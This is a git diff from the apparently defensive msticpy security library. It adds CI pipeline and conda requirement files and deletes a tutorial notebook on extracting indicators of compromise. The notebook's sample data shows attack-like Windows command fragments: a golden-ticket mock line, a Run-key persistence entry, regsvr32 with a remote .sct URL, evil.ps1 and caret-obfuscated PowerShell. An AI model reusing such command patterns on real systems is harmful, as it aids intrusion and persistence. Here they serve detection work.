+        IPSTACK_AUTH: $(keys.ipstack_auth)
+        MSTICPY_TEST_NOSKIP: 1
+        MSTICPY_BUILD_SOURCE: $(prSource)
+      condition: succeededOrFailed()
+      continueOnError: true
+    - task: PublishTestResults@2
+      displayName: 'Publish Test Results'
+      inputs:
+        testResultsFiles: '**/*-results.xml'
+        testRunTitle: 'Python $(python.version)'
+    - task: PublishCodeCoverageResults@1
+      displayName: 'Publish code coverage'
+      inputs:
+        codeCoverageTool: Cobertura
+        summaryFileLocation: '$(System.DefaultWorkingDirectory)/coverage.xml'
+        reportDirectory: '$(System.DefaultWorkingDirectory)/htmlcov'
+- stage: PythonLinters
+  displayName: Python linters and security checkers
+  dependsOn:
+  - PythonTests
+  condition: succeeded('PythonTests')
+  variables:
+    # This is run explicitly, so does not need to be auto-injected
+    skipComponentGovernanceDetection: true
+  jobs:
+    - job: PythonLintersJob
+      pool:
+        vmImage: windows-latest
+      variables:
+        python.version: '3.6'
+      steps:
+      - task: Cache@2
+        displayName: Cache pip packages
+        continueOnError: True
+        inputs:
+          key: python | "$(Agent.OS)"
+          path: $(PIP_CACHE_DIR)
+          restoreKeys: python
+      - script: |
+          python -m pip install --upgrade pip wheel setuptools==56.0.0
+          python -m pip install -r requirements-all.txt
+          python -m pip install -e .
+        displayName: 'Install package and dependencies'
+      - script: |
+          python -m pip install --upgrade pylint pylint_junit
+          pylint msticpy -j 0 --disable=bad-continuation,duplicate-code --disable=E1135,E1101,E1133 --output-format=pylint_junit.JUnitReporter
+        displayName: Pylint
+        continueOnError: true
+        condition: succeededOrFailed()
+      - script: |
+          python -m pip install --upgrade black
+          black -t py36 --diff --check --exclude venv .
+        displayName: Black
+        continueOnError: true
+        condition: succeededOrFailed()
+      - script: |
+          python -m pip install --upgrade bandit
+          bandit -x tests -r -s B303,B404,B603,B607 msticpy
+        displayName: bandit
+        continueOnError: true
+        condition: succeededOrFailed()
+      - script: |
+          python -m pip install --upgrade flake8
+          flake8 --max-line-length=90 --exclude=tests* . --ignore=E501,W503 --jobs=auto
+        displayName: flake8
+        continueOnError: true
+        condition: succeededOrFailed()
+      - script: |
+          python -m pip install mypy lxml types-attrs
+          mypy --ignore-missing-imports --follow-imports=silent --show-column-numbers --junit-xml junit/mypy-test-results.xml msticpy
+        displayName: mypy
+        continueOnError: true
+        condition: succeededOrFailed()
+        env:
+          tools_dir: ${AGENT_TOOLSDIRECTORY}
+      - script: |
+          python -m pip install prospector[with_pyroma]
+          prospector --ignore-paths tests --without-tool pylint
+        displayName: prospector
+        continueOnError: true
+        condition: succeededOrFailed()
+        env:
+          tools_dir: ${AGENT_TOOLSDIRECTORY}
+      - task: PublishTestResults@2
+        displayName: 'Publish Test Results'
+        inputs:
+          testResultsFiles: '**/*-results.xml'
+          testRunTitle: 'Python $(python.version) $(variables.imageName)'
+- stage: SecurityChecks
+  # Pipeline
+  displayName: Azure pipeline, security and component governance tools
+  dependsOn:
+  - PythonTests
+  - PythonLinters
+  variables:
+    # This is run explicitly, so does not need to be auto-injected
+    skipComponentGovernanceDetection: true
+  jobs:
+  - job: SecurityTests
+    # Credscan must be run on Windows
+    pool:
+      vmImage: windows-latest
+      python.version: '3.8'
+    steps:
+    - task: CredScan@2
+      displayName: 'Run CredScan'
+      inputs:
+        toolMajorVersion: V2
+        debugMode: false
+        suppressionsFile: $(Build.SourcesDirectory)\.ci_config\credscan.json
+      continueOnError: true
+      condition: succeededOrFailed()
+    - task: AutoApplicability@1
+      inputs:
+        ExternalRelease: true
+      displayName: 'Run AutoApplicability'
+    - task: PoliCheck@1
+      displayName: 'Run PoliCheck'
+      inputs:
+        SOMEnabled: true
+        optionsUEPATH: $(Build.SourcesDirectory)\.ci_config\UserExclusion.xml
+    - task: VulnerabilityAssessment@0
+      displayName: 'Run Vulnerability Assessment'
+    - task: ComponentGovernanceComponentDetection@0
+      inputs:
+        scanType: 'Register'
+        verbosity: 'Verbose'
+        alertWarningLevel: 'High'
+      displayName: 'Component Detection'
+    - task: AntiMalware@3
+      inputs:
+        InputType: 'Basic'
+        ScanType: 'CustomScan'
+        FileDirPath: '$(Build.StagingDirectory)'
+        EnableServices: true
+        SupportLogOnError: false
+        TreatSignatureUpdateFailureAs: 'Warning'
+        SignatureFreshness: 'UpToDate'
+        TreatStaleSignatureAs: 'Error'
+      continueOnError: true
+      condition: succeededOrFailed()
+    - task: securedevelopmentteam.vss-secure-development-tools.build-task-report.SdtReport@1
+      displayName: 'Create Security Analysis Report'
+      inputs:
+        CredScan: true
+        PoliCheck: true
+    - task: securedevelopmentteam.vss-secure-development-tools.build-task-publishsecurityanalysislogs.PublishSecurityAnalysisLogs@2
+      displayName: 'Publish Security Analysis Logs'
+      inputs:
+        AllTools: false
+        AntiMalware: true
+        APIScan: false
+        BinSkim: false
+        CodesignValidation: false
+        FortifySCA: false
+        FxCop: false
+        ModernCop: false
+        MSRD: false
+        RoslynAnalyzers: false
+        SDLNativeRules: false
+        Semmle: false
+        TSLint: false
+        WebScout: false
+    - task: notice@0
+      displayName: NOTICE File Generator
+      # This fails for external forks
+      condition: not(variables['System.PullRequest.IsFork'])
+    - task: PostAnalysis@1
+      displayName: Post Analysis
+      inputs:
+        CredScan: true
+        PoliCheck: true
+    - task: dependency-check-build-task@5
+      displayName: 'OWASP Dependency Check'
+      inputs:
+        projectName: msticpy
+        scanPath: '$(Build.SourcesDirectory)'
+        format: HTML,JUNIT
+        suppressionPath: '$(Build.SourcesDirectory)'
+      continueOnError: true
+      condition: succeededOrFailed()
+    - task: PublishTestResults@2
+      displayName: 'Publish Test Results'
+      inputs:
+        testResultsFiles: '**/*-results.xml'
+        testRunTitle: 'Python $(python.version)'
+- stage: CreatePythonPackage
+  displayName: Create msticpy distribution package and publish msticpy artifact
+  variables:
+    # This is run explicitly so does not need to be auto-injected
+    skipComponentGovernanceDetection: true
+  dependsOn:
+  - SecurityChecks
+  condition: succeeded('SecurityChecks')
+  jobs:
+  - job: CreateDistPackage
+    pool:
+      vmImage: windows-latest
+    variables:
+      python.version: '$(python.version)'
+    steps:
+    - script: 'pip install --upgrade setuptools==56.0.0 wheel'
+      displayName: 'Install setuptools'
+    - script: 'python setup.py sdist bdist_wheel'
+      displayName: 'Build sdist and wheel'
+    - task: PublishBuildArtifacts@1
+      displayName: 'Publish Artifact: msticpy'
+      inputs:
+        PathtoPublish: dist
+        ArtifactName: msticpy
diff --git a/conda/README.md b/conda/README.md
new file mode 100644
index 000000000..9aee62915
--- /dev/null
+++ b/conda/README.md
@@ -0,0 +1,64 @@
+# Anaconda Environment Setup
+
+### Caveat
+This is a preliminary set of requirements files for *Conda*
+environments. Since some of the packages used by *msticpy*
+are not available as Conda recipes, we have divided the package
+requirements into conda-installable and pip-installable
+requirements files.
+
+Using pip installs into a Conda environment will invalidate
+some of Conda's dependency tracking so *please* do this in
+a dedicated Conda environment - as shown below.
+
+
+## Installation Steps
+Packages available from Conda or Conda forge are installable
+using the `conda/conda-reqs.txt`. No version constraints are
+included in these package specs. Conda will automatically install
+the latest compatible versions of these packages. If you have
+an up-to-date version of Anaconda these versions should be
+compatible with *msticpy*.
+
+### Create your Conda environment
+Python 3.7.6 was the latest Python 3.7 release at the time of
+writing. Some wheels are not yet available for Windows for
+Python 3.8, so you may have problems installing some of the
+*msticpy* dependencies on Windows. *msticpy* should, however,
+work fine with Python 3.8.
+
+```shell
+conda create --name my_env_name python=3.7.6
+conda activate my_env_name
+```
+
+## Append the Conda-Forge channel
+Some of the Conda packages are only available from
+Conda-Forge.
+
+```shell
+conda config --add channels conda-forge
+```
+
+## Install the Conda packages
+
+```shell
+conda install --file {path}/conda-reqs.txt
+```
+
+## Install pip packages
+
+```shell
+conda install pip
+pip install -r {path}/conda-reqs-pip.txt
+```
+
+## Install dev packages (optional)
+
+Installation of these packages is only needed if you are doing
+development work on msticpy.
+
+```shell
+conda install --file {path}/conda-reqs-dev.txt
+pip install -r {path}/conda-reqs-dev-pip.txt
+```
\ No newline at end of file
diff --git a/conda/conda-reqs-dev-pip.txt b/conda/conda-reqs-dev-pip.txt
new file mode 100644
index 000000000..6f2e8d765
--- /dev/null
+++ b/conda/conda-reqs-dev-pip.txt
@@ -0,0 +1,4 @@
+
+prospector>=1.3.1
+pyroma>=3.1
+pytest-check>==1.0.1
\ No newline at end of file
diff --git a/conda/conda-reqs-dev.txt b/conda/conda-reqs-dev.txt
new file mode 100644
index 000000000..a4ecd90ee
--- /dev/null
+++ b/conda/conda-reqs-dev.txt
@@ -0,0 +1,25 @@
+aiohttp>=3.0.0
+bandit>=1.7.0
+beautifulsoup4
+black>=20.8b1
+coverage>=5.5
+filelock>=3.0.0
+flake8>=3.8.4
+markdown>=3.3.4
+mccabe>=0.6.1
+mypy>=0.821
+nbdime>=2.1.0
+pandas>=1.2.5
+pep8-naming>=0.10.0
+pep8>=1.7.1
+pipreqs>=0.4.9
+pycodestyle>=2.6.0
+pydocstyle>=6.0.0
+pyflakes>=2.2.0
+pylint>=2.5.3
+pytest-cov>=2.11.1
+pytest>=5.0.1
+respx==0.17.1
+sphinx_rtd_theme>=0.5.1
+sphinx>=2.1.2
+virtualenv
diff --git a/conda/conda-reqs-pip.txt b/conda/conda-reqs-pip.txt
new file mode 100644
index 000000000..679a36ec4
--- /dev/null
+++ b/conda/conda-reqs-pip.txt
@@ -0,0 +1,18 @@
+azure-core>=1.2.2
+azure-mgmt-core>=1.2.1
+azure-identity>=1.5.0
+azure-keyvault-secrets>=4.0.0
+azure-mgmt-compute>=4.6.2
+azure-mgmt-keyvault>=2.0.0
+azure-mgmt-monitor>=2.0.0
+azure-mgmt-resourcegraph>=8.0.0
+azure-mgmt-subscription>=1.0.0
+azure-storage-blob>=12.5.0
+geoip2>=2.9.0
+html5lib
+ipwhois>=1.1.0
+KqlmagicCustom[jupyter-basic,auth_code_clipboard]>=0.1.114.dev26
+moz_sql_parser>=4.5.0,<=4.11.21016
+passivetotal>=2.5.3
+splunk-sdk>=1.6.0
+tldextract>=2.2.2
diff --git a/conda/conda-reqs.txt b/conda/conda-reqs.txt
new file mode 100644
index 000000000..e42a68036
--- /dev/null
+++ b/conda/conda-reqs.txt
@@ -0,0 +1,31 @@
+attrs>=18.2.0
+azure-common>=1.1.18
+azure-mgmt-network>=2.7.0
+azure-mgmt-resource>=16.1.0
+bokeh>=1.4.0
+cryptography>=3.1
+deprecated>=1.2.4
+dnspython<=2.0.0
+folium>=0.9.0
+httpx>=0.21
+ipython>=7.23.1
+ipywidgets>=7.4.2
+keyring>=13.2.1
+lxml
+matplotlib>=3.0.0
+msrest>=0.6.0
+msrestazure>=0.6.0
+networkx>=2.2
+numpy>=1.15.4
+pandas>=1.1.5
+pygeohash>=1.2.0
+python-dateutil>=2.8.1
+pytz>=2019.2
+pyyaml>=3.13
+respx>=0.19.0
+scikit-learn>=0.20.2
+scipy
+setuptools>=40.6.3
+statsmodels
+tqdm>=4.36.1
+urllib3>=1.23
diff --git a/doc/IoCExtract.ipynb b/doc/IoCExtract.ipynb
deleted file mode 100644
index e89961831..000000000
--- a/doc/IoCExtract.ipynb
+++ /dev/null
@@ -1,2339 +0,0 @@
-{
- "cells": [
-  {
-   "cell_type": "markdown",
-   "metadata": {},
-   "source": [
-    "# Title: msticpy - IoC Extraction\n",
-    "## Description:\n",
-    "This class allows you to extract IoC patterns from a string or a DataFrame.\n",
-    "Several patterns are built in to the class and you can override these or supply new ones.\n"
-   ]
-  },
-  {
-   "cell_type": "markdown",
-   "metadata": {},
-   "source": [
-    "<a id='toc'></a>\n",
-    "## Table of Contents\n",
-    "- [Looking for IoC in a String](#cmdlineiocs)\n",
-    "- [Search DataFrame for IoCs](#dataframeiocs)\n",
-    "- [IoCExtractor API](#iocextractapi)\n",
-    "  - [Predefined Regex Patterns](#regexpatterns)\n",
-    "  - [Adding your own pattern(s)](#addingpatterns)\n",
-    "  - [extract() method](#extractmethod)\n",
-    "  - [Merge the results with the input DataFrame](#mergeresults)"
-   ]
-  },
-  {
-   "cell_type": "code",
-   "execution_count": 2,
-   "metadata": {
-    "scrolled": true
-   },
-   "outputs": [],
-   "source": [
-    "# Imports\n",
-    "import sys\n",
-    "MIN_REQ_PYTHON = (3,6)\n",
-    "if sys.version_info < MIN_REQ_PYTHON:\n",
-    "    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')\n",
-    "    print('or later is selected as the active kernel.')\n",
-    "    sys.exit(\"Python %s.%s or later is required.\\n\" % MIN_REQ_PYTHON)\n",
-    "\n",
-    "\n",
-    "import numpy as np\n",
-    "from IPython import get_ipython\n",
-    "from IPython.display import display, HTML\n",
-    "import ipywidgets as widgets\n",
-    "\n",
-    "import matplotlib.pyplot as plt\n",
-    "import seaborn as sns\n",
-    "import networkx as nx\n",
-    "sns.set()\n",
-    "import pandas as pd\n",
-    "pd.set_option('display.max_rows', 500)\n",
-    "pd.set_option('display.max_columns', 50)\n",
-    "pd.set_option('display.max_colwidth', 100)\n",
-    "\n",
-    "import os\n",
-    "module_path = os.path.abspath(os.path.join('../..'))\n",
-    "if module_path not in sys.path:\n",
-    "    sys.path.append(module_path)\n",
-    "   \n",
-    "import msticpy.sectools as sectools\n",
-    "import msticpy.nbtools as asi\n",
-    "import msticpy.nbtools.kql as qry\n",
-    "import msticpy.nbtools.nbdisplay as nbdisp\n"
-   ]
-  },
-  {
-   "cell_type": "code",
-   "execution_count": 56,
-   "metadata": {},
-   "outputs": [
-    {
-     "data": {
-      "text/html": [
-       "<div>\n",
-       "<style scoped>\n",
-       "    .dataframe tbody tr th:only-of-type {\n",
-       "        vertical-align: middle;\n",
-       "    }\n",
-       "\n",
-       "    .dataframe tbody tr th {\n",
-       "        vertical-align: top;\n",
-       "    }\n",
-       "\n",
-       "    .dataframe thead th {\n",
-       "        text-align: right;\n",
-       "    }\n",
-       "</style>\n",
-       "<table border=\"1\" class=\"dataframe\">\n",
-       "  <thead>\n",
-       "    <tr style=\"text-align: right;\">\n",
-       "      <th></th>\n",
-       "      <th>CommandLine</th>\n",
-       "    </tr>\n",
-       "  </thead>\n",
-       "  <tbody>\n",
-       "    <tr>\n",
-       "      <th>0</th>\n",
-       "      <td>.\\ftp  -s:C:\\RECYCLER\\xxppyy.exe</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>1</th>\n",
-       "      <td>.\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>2</th>\n",
-       "      <td>cmd  /c \"systeminfo &amp;&amp; systeminfo\"</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>3</th>\n",
-       "      <td>.\\rundll32  /C 12345.exe</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>4</th>\n",
-       "      <td>.\\rundll32  /C c:\\users\\MSTICAdmin\\12345.exe</td>\n",
-       "    </tr>\n",
-       "  </tbody>\n",
-       "</table>\n",
-       "</div>"
-      ],
-      "text/plain": [
-       "                                                          CommandLine\n",
-       "0                                    .\\ftp  -s:C:\\RECYCLER\\xxppyy.exe\n",
-       "1  .\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !\n",
-       "2                                  cmd  /c \"systeminfo && systeminfo\"\n",
-       "3                                            .\\rundll32  /C 12345.exe\n",
-       "4                        .\\rundll32  /C c:\\users\\MSTICAdmin\\12345.exe"
-      ]
-     },
-     "execution_count": 56,
-     "metadata": {},
-     "output_type": "execute_result"
-    }
-   ],
-   "source": [
-    "# Load test data\n",
-    "process_tree = pd.read_csv('data/process_tree.csv')\n",
-    "process_tree[['CommandLine']].head()"
-   ]
-  },
-  {
-   "cell_type": "markdown",
-   "metadata": {},
-   "source": [
-    "<a id='cmdlineiocs'></a>[Contents](#toc)\n",
-    "## Looking for IoC in a String\n",
-    "Here we:\n",
-    "- Get a commandline from our data set.\n",
-    "- Pass it to the IoC Extractor\n",
-    "- View the results"
-   ]
-  },
-  {
-   "cell_type": "code",
-   "execution_count": 8,
-   "metadata": {},
-   "outputs": [
-    {
-     "data": {
-      "text/plain": [
-       "'netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt'"
-      ]
-     },
-     "execution_count": 8,
-     "metadata": {},
-     "output_type": "execute_result"
-    }
-   ],
-   "source": [
-    "# get a commandline from our data set\n",
-    "cmdline = process_tree['CommandLine'].loc[78]\n",
-    "cmdline"
-   ]
-  },
-  {
-   "cell_type": "code",
-   "execution_count": 13,
-   "metadata": {},
-   "outputs": [
-    {
-     "name": "stdout",
-     "output_type": "stream",
-     "text": [
-      "\n",
-      "Potential IoCs found in alert process:\n"
-     ]
-    },
-    {
-     "data": {
-      "text/plain": [
-       "defaultdict(set,\n",
-       "            {'ipv4': {'1.2.3.4'},\n",
-       "             'windows_path': {'C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt'}})"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    }
-   ],
-   "source": [
-    "# Instantiate an IoCExtract object\n",
-    "from msticpy.sectools import IoCExtract\n",
-    "ioc_extractor = IoCExtract()\n",
-    "\n",
-    "# any IoCs in the string?\n",
-    "iocs_found = ioc_extractor.extract(cmdline)\n",
-    "    \n",
-    "if iocs_found:\n",
-    "    print('\\nPotential IoCs found in alert process:')\n",
-    "    display(iocs_found)\n"
-   ]
-  },
-  {
-   "cell_type": "markdown",
-   "metadata": {},
-   "source": [
-    "<a id='dataframeiocs'></a>[Contents](#toc)\n",
-    "## If we have a DataFrame, look for IoCs in the whole data set\n",
-    "You can replace the ```data=``` parameter to ioc_extractor.extract() to pass other data frames.\n",
-    "Use the ```columns``` parameter to specify which column or columns that you want to search."
-   ]
-  },
-  {
-   "cell_type": "code",
-   "execution_count": 10,
-   "metadata": {},
-   "outputs": [
-    {
-     "data": {
-      "text/html": [
-       "<h3>IoC patterns found in process tree.</h3>"
-      ],
-      "text/plain": [
-       "<IPython.core.display.HTML object>"
-      ]
-     },
-     "metadata": {},
-     "output_type": "display_data"
-    },
-    {
-     "data": {
-      "text/html": [
-       "<div>\n",
-       "<style scoped>\n",
-       "    .dataframe tbody tr th:only-of-type {\n",
-       "        vertical-align: middle;\n",
-       "    }\n",
-       "\n",
-       "    .dataframe tbody tr th {\n",
-       "        vertical-align: top;\n",
-       "    }\n",
-       "\n",
-       "    .dataframe thead th {\n",
-       "        text-align: right;\n",
-       "    }\n",
-       "</style>\n",
-       "<table border=\"1\" class=\"dataframe\">\n",
-       "  <thead>\n",
-       "    <tr style=\"text-align: right;\">\n",
-       "      <th></th>\n",
-       "      <th>IoCType</th>\n",
-       "      <th>Observable</th>\n",
-       "      <th>SourceIndex</th>\n",
-       "    </tr>\n",
-       "  </thead>\n",
-       "  <tbody>\n",
-       "    <tr>\n",
-       "      <th>0</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\RECYCLER\\xxppyy.exe</td>\n",
-       "      <td>0</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>1</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\ftp</td>\n",
-       "      <td>0</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>2</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\reg</td>\n",
-       "      <td>1</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>3</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\rundll32</td>\n",
-       "      <td>3</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>4</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\users\\MSTICAdmin\\12345.exe</td>\n",
-       "      <td>4</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>5</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\rundll32</td>\n",
-       "      <td>4</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>6</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\rundll32</td>\n",
-       "      <td>5</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>7</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\users\\MSTICAdmin\\1234.exe</td>\n",
-       "      <td>6</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>8</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\rundll32</td>\n",
-       "      <td>6</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>9</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\rundll32</td>\n",
-       "      <td>7</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>10</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\reg.exe  add \\hkcu\\software\\microsoft\\some\\key\\Run</td>\n",
-       "      <td>8</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>11</th>\n",
-       "      <td>dns</td>\n",
-       "      <td>tsetup.1.0.14.exe</td>\n",
-       "      <td>9</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>12</th>\n",
-       "      <td>dns</td>\n",
-       "      <td>tsetup.1.exe</td>\n",
-       "      <td>9</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>13</th>\n",
-       "      <td>dns</td>\n",
-       "      <td>tsetup.1.0.14.tmp</td>\n",
-       "      <td>9</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>14</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Diagnostics\\UserTmp\\tsetup.1.exe</td>\n",
-       "      <td>9</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>15</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\Users\\MSTICAdmin\\Downloads\\tsetup.1.0.14.exe</td>\n",
-       "      <td>9</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>16</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\Users\\MSTICAdmin\\AppData\\Local\\Temp\\2\\is-01DD7.tmp\\tsetup.1.0.14.tmp</td>\n",
-       "      <td>9</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>17</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\rundll32.exe</td>\n",
-       "      <td>10</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>18</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\netsh.exe</td>\n",
-       "      <td>11</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>19</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\cmd</td>\n",
-       "      <td>12</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>20</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\inetpub\\wwwroot</td>\n",
-       "      <td>12</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>21</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\cmd</td>\n",
-       "      <td>13</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>22</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\inetpub\\wwwroot</td>\n",
-       "      <td>13</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>23</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\cmd</td>\n",
-       "      <td>14</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>24</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\inetpub\\wwwroot</td>\n",
-       "      <td>14</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>25</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\cmd</td>\n",
-       "      <td>15</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>26</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>\\\\[REDACTED]\\c$\\users\\[REDACTED]\\Documents</td>\n",
-       "      <td>15</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>27</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\ProgramData</td>\n",
-       "      <td>15</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>28</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\cmd</td>\n",
-       "      <td>16</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>29</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\inetpub\\wwwroot</td>\n",
-       "      <td>16</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>30</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\windows\\system32\\inetsrv\\appcmd</td>\n",
-       "      <td>16</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>31</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\cmd</td>\n",
-       "      <td>17</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>32</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\inetpub\\wwwroot</td>\n",
-       "      <td>17</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>33</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\inetpub\\logs\\logFiles\\W3SVC1</td>\n",
-       "      <td>17</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>34</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Diagnostics\\UserTmp\\perfc.dat</td>\n",
-       "      <td>18</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>35</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Diagnostics\\UserTmp\\sdopfjiowtbkjfnbeioruj.exe</td>\n",
-       "      <td>19</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>36</th>\n",
-       "      <td>dns</td>\n",
-       "      <td>doubleextension.pdf.exe</td>\n",
-       "      <td>20</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>37</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\Diagnostics\\UserTmp\\doubleextension.pdf.exe</td>\n",
-       "      <td>20</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>38</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>\\Windows\\system32\\conhost.exe</td>\n",
-       "      <td>22</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>39</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>\\C:</td>\n",
-       "      <td>22</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>40</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>c:\\testshare</td>\n",
-       "      <td>26</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>41</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>\\\\MSTICAlertsWin1\\TestShare</td>\n",
-       "      <td>27</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>42</th>\n",
-       "      <td>url</td>\n",
-       "      <td>http://server/file.sct</td>\n",
-       "      <td>31</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>43</th>\n",
-       "      <td>dns</td>\n",
-       "      <td>server</td>\n",
-       "      <td>31</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>44</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\regsvr32</td>\n",
-       "      <td>31</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>45</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\suchost.exe</td>\n",
-       "      <td>32</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>46</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\evil.ps1;</td>\n",
-       "      <td>35</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>47</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\powershell.exe</td>\n",
-       "      <td>35</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>48</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\powershell</td>\n",
-       "      <td>36</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>49</th>\n",
-       "      <td>url</td>\n",
-       "      <td>http://somedomain/best-kitten-names-1.jpg'</td>\n",
-       "      <td>37</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>50</th>\n",
-       "      <td>dns</td>\n",
-       "      <td>somedomain</td>\n",
-       "      <td>37</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>51</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>\\AppData\\Local\\Temp\\kittens1.jpg';</td>\n",
-       "      <td>37</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>52</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>C:\\Users\\$env:UserName</td>\n",
-       "      <td>37</td>\n",
-       "    </tr>\n",
-       "    <tr>\n",
-       "      <th>53</th>\n",
-       "      <td>windows_path</td>\n",
-       "      <td>.\\pOWErS^H^ElL^.eX^e^</td>\n",
-       "      <td>37</td>\n",
